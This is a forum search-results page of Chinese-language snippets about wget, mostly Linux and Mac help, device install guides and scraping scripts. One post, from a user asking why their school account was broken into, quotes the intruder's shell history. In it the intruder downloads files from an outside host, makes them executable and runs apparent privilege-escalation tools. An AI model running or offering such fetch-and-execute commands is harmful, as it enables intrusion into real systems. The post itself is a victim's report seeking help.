c********1 发帖数: 5269 | 1 It is tricky to manually tracking cookies, and deal with encryption and
https encryption.
You can try curl if resource is not an issue.
curl should not use a lot of more computer resouce than wget. |
|
v**k 发帖数: 207 | 2 问个基本问题,在 mac 的linux 上怎么装 apt-get, wget 这些东西. 或者general 的
有些没有这些东西的 linux 系统,没有这些东西,怎么装。有些甚至没有 yum.
多谢! |
|
h**********c 发帖数: 4120 | 3 这个挺闹心,要在APPLE APP store上用自己的信用卡注册一个APPLE ID,不知道别的公
司怎么办的,叔是用自己的卡。
然后在APP STORE 下在homebrew 之流的东西,wget etc。 |
|
v**k 发帖数: 207 | 4 问个基本问题,在 mac 的linux 上怎么装 apt-get, wget 这些东西. 或者general 的
有些没有这些东西的 linux 系统,没有这些东西,怎么装。有些甚至没有 yum.
多谢! |
|
h**********c 发帖数: 4120 | 5 这个挺闹心,要在APPLE APP store上用自己的信用卡注册一个APPLE ID,不知道别的公
司怎么办的,叔是用自己的卡。
然后在APP STORE 下在homebrew 之流的东西,wget etc。 |
|
t*********l 发帖数: 30 | 6 if you are not root and just want to install it for yourself,
you'd better use
cd wget-xxx
./configure --prefix=$HOME/local
just my 2 cents |
|
i**********r 发帖数: 36 | 7 【 以下文字转载自 Internet 讨论区 】
【 原文由 interstellar 所发表 】
i am trying to webpage query a database and download qualified data.
this includes 1) filling in all the parameters, pressing "send query",
and 2) selecting a filename for the data in a window that pops up late.
Now i want to use some scripts to do many queries. and i choosed wget.
for the first step, filling the parameters, I just examined its
"http://....." and changed parameters according to my queries, and gave
the changed "http://..." to wge |
|
o***z 发帖数: 133 | 8 search other paths before /usr/bin in your $PATH
to see if there are other wgets |
|
f****a 发帖数: 28 | 9 没看到wget有设置binary或者ascii的参数,它是不是本身就一只
用binary方式在下载东西的?有个ho大ho慢的文件想用它续传,
所以事先问问:) |
|
N*********r 发帖数: 40 | 10 RTFM!
" Wget also supports the `type' feature for FTP URLs. By default, FTP
documents are retrieved in the binary mode (type `i'), which means that
they are downloaded unchanged. Another useful mode is the `a'
("ASCII") mode, which converts the line delimiters between the
different operating systems, and is thus useful for text files. Here
is an example:
ftp://host/directory/file;type=a
" |
|
f****a 发帖数: 28 | 11 谢谢:)
不好意思,我们的server里没有wget的manual,所以问这种傻问题:( |
|
s****e 发帖数: 68 | 12 hi, i want to download something from a ftp site but with
Chinese character directory name. Anyone knows how can I
do it with wget? the system is Unix and I tried using
western code for those Chinese charaters but doesn't works.
Thanks a lot! |
|
o****o 发帖数: 8077 | 13 用cygwin装了wget也不行,curl更是没头绪
还需要怎么搞么? |
|
|
z*********n 发帖数: 94654 | 15 嗯,wget不错,我一般用wget下载书
for i in `seq -w 001 130`; do wget http://pingshuwangzhan/书/$i.mp3; done
不过下载了也不看 |
|
|
|
y*y 发帖数: 427 | 18 最新更新02/19/2011
PBO专用1.43 v2通用固件已经发布。新买的带官方固件的PBO都可以直接刷squashfs格式的。老的bootcode<18的可能必须要硬刷yaffs格式的。以前刷成P61-Beta Megapack bootcode neutral可能需要清空ROM,TTL硬刷。
此版本会重启两次。所以要耐心等待(保险15分钟以上)。有些机型开始会遥控失灵,因而卡在主菜单。保证至少等待如上时间后,硬开关电源启动,应该就可以正常使用了。
http://www.hdpfans.com/thread-7980-1-1.html
以下原文就可以忽略,不用折腾了。
***********************************************************************************
01/01/2011
----------------------------------------------------
本供略提供P61-Beta Megapack bootcode neutral及其中文在线电影电视播放的修改。
因为所选的... 阅读全帖 |
|
s***d 发帖数: 960 | 19 ARCHLINUX 按照以下步骤装成了
Pogoplug v2 (Pink/Gray)
Overview
Installation
VERIFY YOUR MODEL NUMBER! These instructions only apply to models POGO-
E02 and POGO-E02G.
These instructions will void your warranty. While every precaution is
taken to ensure nothing bad happens, all actions are at your own risk.
my.pogoplug.com, the mobile applications, and the desktop Pogoplug
connector will no longer work.
With the device on and online, attempt to SSH to the IP the device
received thro... 阅读全帖 |
|
h*w 发帖数: 1182 | 20 抛砖引玉,pogoplug上面可以装很多东西。
本人新手,这个安装说明算是一个备份吧,如果要重新安装可以看看,也可以给新新手
参考。也请高手指点。
为什么没有装arch或者debian是因为看到有人说pogoplug自带的ntfs驱动比ntfs-3g性
能好,就想用原系统加装optware来安装samba共享。而且如果还想用my.pogoplug.com
也可以直接用。还没有实验过到底是自带的ntfs驱动快还是ntfs-3g快,就当瞎折腾了
,呵呵。
本说明基于POGO-E02,不保证在其他版本的pogoplug上也工作。对于使用本安装说明引
起的任何损失概不负责。
------------------------------
1. Find your Pogoplug ip address in your router.
2. Log into your Pogoplug online account that you created during the initial
setup of the POGO. Go into the advanced tab / Security.... 阅读全帖 |
|
h*w 发帖数: 1182 | 21 抛砖引玉,pogoplug上面可以装很多东西。
本人新手,这个安装说明算是一个备份吧,如果要重新安装可以看看,也可以给新新手
参考。也请高手指点。
为什么没有装arch或者debian是因为看到有人说pogoplug自带的ntfs驱动比ntfs-3g性
能好,就想用原系统加装optware来安装samba共享。而且如果还想用my.pogoplug.com
也可以直接用。还没有实验过到底是自带的ntfs驱动快还是ntfs-3g快,就当瞎折腾了
,呵呵。这个主要是给家里只有windowns电脑的用,要是有linux的机器,还是用ext3或
ext4最快。
本说明基于POGO-E02,不保证在其他版本的pogoplug上也工作。对于使用本安装说明引
起的任何损失概不负责。
------------------------------
1. Find your Pogoplug ip address in your router.
2. Log into your Pogoplug online account that you created during the initial
setup... 阅读全帖 |
|
|
w*******e 发帖数: 285 | 23 我想用java程序在远程执行任意传输的命令,比如
wget --header "host: www.google.com" -O result.htm 64.233.167.99
但是直接用Runtime.getRuntime().exec运行整个命令就会出错,因为"host: www.
google.com"里面有空格。我需要拆开成一个array来执行才行,但是有的时候比较复杂
,比如引号当中有引号什么的,有没有什么现成的parser把参数break成跟普通的shell
解析的一样的呢?
比如输入
wget --header "host: www.google.com" -O result.htm 64.233.167.99
就能输出
wget |
|
S*A 发帖数: 7142 | 24 如果不要编程的话,建议你还是看看 wget 的手册
争取用 wget 拿下来吧。wget 有很多隐晦功能下载
网页的,可以指定什么样子的自动爬下来。 |
|
|
y*j 发帖数: 32 | 26 我在学校里面,收发 Email 都喜欢 ssh 到系
服务器上后用 pine。今日忽然发现有人用我的
用户名和密码登陆:黑客太牛了,居然知道我的
密码。而且,他从我的 .ssh 目录下知道我还
ssh 过其他地方,于是他一个一个登陆过去,
都知道用户名和密码!都不知道他是怎么弄的。
幸好他好象也没有干一些坏事情,例如删除文件
发 Email 之类的。下面是我的 .history
各位高手看看怎么回事,怎么解决。
cd .ssh
cat known_hosts
uname -a
w
wget another00.home.ro/ups
chmod +x ups
./ups
wget another00.home.ro/local1.tgz
cd local
tar -xzvf local1.tgz
cd local
./mem
id
./t
./prt
./su
ls
./brk
另一个服务器上的:
#+1093705127
uname -a
#+1093705131
cd .ssh
#+1093705144
cat /etc/hosts
#+1093705173
wget www.ge |
|
m**i 发帖数: 89 | 27
赫赫,这种东西...要做个贴文机上站机或者抓文机还不容易么:-)
俺这里随手写个抓文机,抓下某个版的所有文章:
#!/usr/bin/perl
$board=$ARGV[0];
$file='bbsdoc?A'.$board;
$burl='http://bbs.mit.edu/cgi-bin/'.$file;
`wget $burl`;
open (FF, "<$file");
while () {
($sub)=/\d\d:\d\d\\
$str='http://bbs.mit.edu'.$sub if ($sub ne "");
`wget $str` if ($str ne "");
$sub="";
$str="";
}
用法:
环境:PERL, wget
命令:假设它存成文件grab.pl
grab.pl Boardname
其中Boardname是大小写敏感的。比如Programming
扩充:修改模式匹配,可以只抓 | |
|
p******f 发帖数: 162 | 28
\ is a shell meta char, which is striped before wget has a chance
to see it. Use \\ on command line to pass a literal \ to wget.
But it seems this does not work, cause wget does not treat \ as
a special char. Use %40 for a literal @ seems work. |
|
h*****a 发帖数: 1992 | 29 最近老板不知道从哪里搞来一台古董SUN Ultra 10 Workstation,叫我给他装机。偶是菜
鸟, 装Solaris 8 Companion CD (就是里面有gnu gcc, wget, sudo等等工具的那个碟
)出问题了。明明在安装的时候选了wget, sudo的,但是装完了以后怎么也找不到wget和
sudo的命令在哪里。gcc反而找的到,在/opt/bin下面。
哪位大虾知道是怎么回事啊? 谢过了先 //bow |
|
OX 发帖数: 516 | 30 安装Debian过程中出现问题,运行./dockstar.debian-squeeze.sh后
This filesystem will be automatically checked every 26 mounts or
180 days, whichever comes first. Use tune2fs -c or -i to override.
mkswap: can't open '/dev/sda2': No such device or address
mkdir: cannot create directory '/tmp/debootstrap': File exists
Connecting to cdn.debian.net (128.30.2.36:80)
wget: server returned error: HTTP/1.1 404 Not Found
ar: can't open 'debootstrap.deb': No such file or directory
tar: can't open 'data.tar.gz': No such f... 阅读全帖 |
|
OX 发帖数: 516 | 31 安装Debian过程中出现问题,运行./dockstar.debian-squeeze.sh后
This filesystem will be automatically checked every 26 mounts or
180 days, whichever comes first. Use tune2fs -c or -i to override.
mkswap: can't open '/dev/sda2': No such device or address
mkdir: cannot create directory '/tmp/debootstrap': File exists
Connecting to cdn.debian.net (128.30.2.36:80)
wget: server returned error: HTTP/1.1 404 Not Found
ar: can't open 'debootstrap.deb': No such file or directory
tar: can't open 'data.tar.gz': No such f... 阅读全帖 |
|
t*****g 发帖数: 7455 | 32 上午8:17(9 小时前)你应该了解阿桑奇和电报门,我的朋友从 政府丑闻 作者:
Robert原始来源:https://www.zuola.com/weblog/?p=1604
最近的新闻里,你应该听过阿桑奇的名字,阿桑奇是一个极其牛逼的人物,你应该了解
他。下面,我会用中文介绍我所了解到的阿桑奇。我看英文也很费力,我知道总有人也
像我一样希望能看到中文的比较详细的相关资料。也许你看过维基百科上关于他的简历
,但那些不详细,你仍然需要读这篇文章,如果能把我收集的这些线索添加到维基百科
的词条中去则更佳。
据国际刑警组织在网页上提供的信息:
Present family name:
ASSANGE
Forename:
JULIAN PAUL
Sex:
MALE
Date of birth:
3 July 1971 (39 years old)
Place of birth:
TOWNSVILLE, QUEENSLAND, Australia
Language spoken:
English
Nationality:
Australia
可知阿桑奇的全名是 Julian Paul Assa... 阅读全帖 |
|
|
|
d**e 发帖数: 6098 | 35 ☆─────────────────────────────────────☆
gate (态度+做题) 于 (Sun Sep 30 23:00:35 2012, 美东) 提到:
希望对找工作的同胞有用。不过我以后的面试题可是会换了,哈。
【 以下文字转载自 Topcoders 俱乐部 】
发信人: gate (态度+做题), 信区: Topcoders
标 题: Re: G Interview Workshop
发信站: BBS 未名空间站 (Sat Sep 29 21:13:43 2012, 美东)
先说amzn的录取比例。我看了一下过去一年的,SDE 1,2,3从简历到最后接受offer的
比例是3-4%。 onsite -> offer比例30%, 最后有大概60%的人接受。SDE1接受offer的
比例明显高。SDE3接受比例最低,估计牛人都去google了。
再说面试,就我们大组(>200人)来看,面试的题目实在是简单。电面一般是2 sum,
find 2 min number in array这种口水题。我偷的zhangbz的数组去重的题电面了十几
个人只有两... 阅读全帖 |
|
a**********0 发帖数: 422 | 36 The Unix Commands
其实就是攒了一下网上的资料
# Create a new tar archive.
# the folder dirname/ is compressed into archive_name.tar
tar cvf archive_name.tar dirname/
# Extract from an existing tar archive
tar xvf archive_name.tar
# View an existing tar archive
tar tvf archive_name.tar
# Search for a given string in a file (case in-sensitive search).
grep -i "the" demo_file
# Print the matched line, along with the 3 lines after it.
grep -A 3 -i "example" demo_text
# Search for a given string in all files recur... 阅读全帖 |
|
b******y 发帖数: 9224 | 37
在Linux上,用wget command就能够下载一个网站所有的页面和图像啥的, 比如说:
wget -r www.thewebsite.com
where "thewebsite" is your target website to download. "-r" is for
recursively downloading all directories. |
|
s******m 发帖数: 2310 | 38 php页面啥的下载不来吧?只有html的可行吧?
在Linux上,用wget command就能够下载一个网站所有的页面和图像啥的, 比如说:
wget -r www.thewebsite.com
where "thewebsite" is your target website to download. "-r" is for
recursively downloading all directories. |
|
s***d 发帖数: 960 | 39 【 以下文字转载自 Apple 讨论区 】
发信人: shkid (shanghai kid), 信区: Apple
标 题: XBMC可以装在APPLE TV最新的IOS上了
发信站: BBS 未名空间站 (Sun Feb 24 01:45:57 2013, 美东)
以下是具体装法:
Installing from the command line
This is the same build installed from the nitoTV menu, if installed.
Open up your terminal/ssh application and enter the following command to
log in to your ATV2. Note, you need to replace "YOUR.ATV2.IP.ADDRESS" with
the IP address of the Apple TV:
ssh r**[email protected]
EXAMPLE: ssh ro... 阅读全帖 |
|
s**d 发帖数: 72 | 40 在XBMC中视频要好几次才能加载上。
In Linux, one can use wget to get similar results
$ wget 'http://live.gslb.letv.com/gslb?stream_id=chongqing&tag=live&ext=m3u8'
One will get 1/2 failures and 1/2 successes
The failure message looks
...
Connecting to 65.255.32.73:80... connected.
HTTP request sent, awaiting response... 502 Bad Gateway
06:19:03 ERROR 502: Bad Gateway. |
|
s***d 发帖数: 960 | 41 以下是具体装法:
Installing from the command line
This is the same build installed from the nitoTV menu, if installed.
Open up your terminal/ssh application and enter the following command to
log in to your ATV2. Note, you need to replace "YOUR.ATV2.IP.ADDRESS" with
the IP address of the Apple TV:
ssh r**[email protected]
EXAMPLE: ssh r**[email protected]
You will be asked for a password: default password is alpine
Continue to enter the following commands:
ap... 阅读全帖 |
|
|
m***a 发帖数: 38 | 43
wget -post-data xxxxx URL -O page.html
this will post the account/passwd, and save the page to page.html
You must know HTML form. check man page of wget to learn about -post-data
sed
use sed to extract the string out
you must be very UNIX or ask a UNIX-acquaited friend.
to |
|
w***g 发帖数: 5958 | 44 一行bash命令的事情
if wget -q 网页地址 -O - | grep 关键字正则表达式 > /dev/null
then
sendmail -t <
From: f**[email protected]
To: [email protected]
Subject: your key word appeard
in URL
FOO
fi
把这个命令放到脚本中, 然后加入crontab就可以了. wget也可以做recursive crawl,
然后用grep -R 表达式 网页目录/* 来搜索整个目录. |
|
s***d 发帖数: 960 | 45 【 以下文字转载自 Apple 讨论区 】
发信人: shkid (shanghai kid), 信区: Apple
标 题: XBMC可以装在APPLE TV最新的IOS上了
发信站: BBS 未名空间站 (Sun Feb 24 01:45:57 2013, 美东)
以下是具体装法:
Installing from the command line
This is the same build installed from the nitoTV menu, if installed.
Open up your terminal/ssh application and enter the following command to
log in to your ATV2. Note, you need to replace "YOUR.ATV2.IP.ADDRESS" with
the IP address of the Apple TV:
ssh r**[email protected]
EXAMPLE: ssh ro... 阅读全帖 |
|
|
p*****a 发帖数: 1152 | 47 Arch里有makepkg.conf,但可能没有Gentoo那么灵活。
贴个例子:
#
# /etc/makepkg.conf
#
#########################################################################
# SOURCE ACQUISITION
#########################################################################
#
#-- The download utilities that makepkg should use to acquire sources
# Format: 'protocol::agent'
DLAGENTS=('ftp::/usr/bin/wget -c --passive-ftp -t 3 --waitretry=3 -O %o %u'
'http::/usr/bin/wget -c -t 3 --waitretry=3 -O %o %u'
'https::/usr/bi |
|